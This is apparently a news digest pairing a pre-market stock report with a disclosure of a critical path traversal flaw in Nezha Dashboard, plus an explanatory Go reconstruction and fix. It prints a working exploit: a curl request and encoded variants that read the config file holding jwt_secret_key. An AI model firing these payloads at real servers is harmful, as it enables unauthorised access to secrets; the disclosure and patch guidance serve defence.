US pre-market: semiconductor stocks broadly higher, SpaceX up more than 6%
In US pre-market trading, semiconductor stocks rose broadly: Micron Technology up more than 5%, Super Micro Computer up more than 5%, AMD up nearly 5%, Intel up nearly 4%, and ASML up nearly 3%.
SpaceX rose more than 6%; the company listed last Friday and closed up 19.22% on its first trading day.
Nezha Dashboard (哪吒探针) has a critical path traversal vulnerability (GHSA-5c25-7vpj-9mqh)
The Dashboard's NoRoute handler (fallbackToFrontend) uses strings.HasPrefix(c.Request.URL.Path, "/dashboard") to decide whether a request is for a frontend static asset. That check is a raw string prefix match rather than a path-segment match, so /dashboard../xxx also passes it.
The path is then processed with strings.TrimPrefix + path.Join, which normalizes the .., letting an attacker climb out of the admin-dist directory and read arbitrary files under the working directory. Go's built-in .. protection in http.ServeFile does not stop this "glued prefix" bypass.
Attack method
curl --path-as-is 'http://target:port/dashboard../data/config.yaml'
# Variants, for reference
/dashboard%2e%2e/data/config.yaml
/dashboard..%2fdata/config.yaml
What should MJJ do
Upgrade to 2.0.13 or later immediately, and check whether the historical jwt_secret_key has been leaked (rotating the key is recommended).
https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
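The prefix-confusion mechanism described above, as an added example that is not the project's code: `vulnerableResolve` reconstructs the flawed HasPrefix + TrimPrefix + path.Join sequence, `safeResolve` is one hardened form (path-segment match plus a containment check), and `requestPath` shows why the two percent-encoded variants collapse to the same URL.Path as the plain payload. The function names, the stand-alone structure and the sample request list are my own; only the `/dashboard` prefix, the `admin-dist` directory and the payloads come from the post.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// adminDist is the directory the frontend assets are served from (named in the advisory).
const adminDist = "admin-dist"

// vulnerableResolve models the flawed logic the advisory describes (a stand-alone
// reconstruction, not the project's code): a raw string prefix check, then
// TrimPrefix + path.Join. It returns the file path that would be served, or ""
// when the request would not be treated as a frontend asset at all.
func vulnerableResolve(urlPath string) string {
	if !strings.HasPrefix(urlPath, "/dashboard") { // "/dashboard../x" passes this
		return ""
	}
	rel := strings.TrimPrefix(urlPath, "/dashboard") // "../data/config.yaml"
	// path.Join cleans the result, so the leading ".." climbs out of adminDist.
	return path.Join(adminDist, rel)
}

// safeResolve is a hardened form: match on a whole path segment, re-root the
// remainder so ".." cannot climb above the dist root, and verify containment.
func safeResolve(urlPath string) (string, error) {
	if urlPath != "/dashboard" && !strings.HasPrefix(urlPath, "/dashboard/") {
		return "", errors.New("not a dashboard asset request")
	}
	rel := strings.TrimPrefix(urlPath, "/dashboard")
	// Cleaning a rooted path discards any ".." segments that would go above "/".
	full := path.Join(adminDist, path.Clean("/"+rel))
	// Defense in depth: refuse anything that still resolves outside adminDist.
	if full != adminDist && !strings.HasPrefix(full, adminDist+"/") {
		return "", errors.New("path escapes " + adminDist)
	}
	return full, nil
}

// requestPath shows what c.Request.URL.Path holds for a raw request-target:
// net/url percent-decodes %2e and %2f when filling URL.Path, so the encoded
// variants become the same "/dashboard../..." string as the plain payload.
func requestPath(rawTarget string) string {
	u, err := url.ParseRequestURI(rawTarget)
	if err != nil {
		return ""
	}
	return u.Path
}

func main() {
	// Constructed request-targets: the advisory's payload, its two encoded
	// variants, and a legitimate asset request for comparison.
	targets := []string{
		"/dashboard../data/config.yaml",
		"/dashboard%2e%2e/data/config.yaml",
		"/dashboard..%2fdata/config.yaml",
		"/dashboard/index.html",
	}
	for _, t := range targets {
		p := requestPath(t)
		safe, err := safeResolve(p)
		if err != nil {
			safe = "rejected: " + err.Error()
		}
		fmt.Printf("%-36s URL.Path=%-32s vulnerable=%-24s safe=%s\n",
			t, p, vulnerableResolve(p), safe)
	}
}
```

Note why the existing Go protections do not fire: `path.Clean("/dashboard../data/config.yaml")` returns the string unchanged, because `dashboard..` is an ordinary segment rather than a `..` segment, and `http.ServeFile`'s dot-dot check looks at the segments of `r.URL.Path` in the same way. The bare `..` only comes into existence after `strings.TrimPrefix` removes `/dashboard`, which is exactly the point where the flawed code hands it to `path.Join`.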
Pre-auth path traversal via /dashboard.. prefix confusion leaks jwt_secret_key
### Summary
`fallbackToFrontend` in the dashboard's `NoRoute` handler treats any URL whose **raw string** starts with `/dashboard` as an admin-frontend asset request. The check uses `strings.H...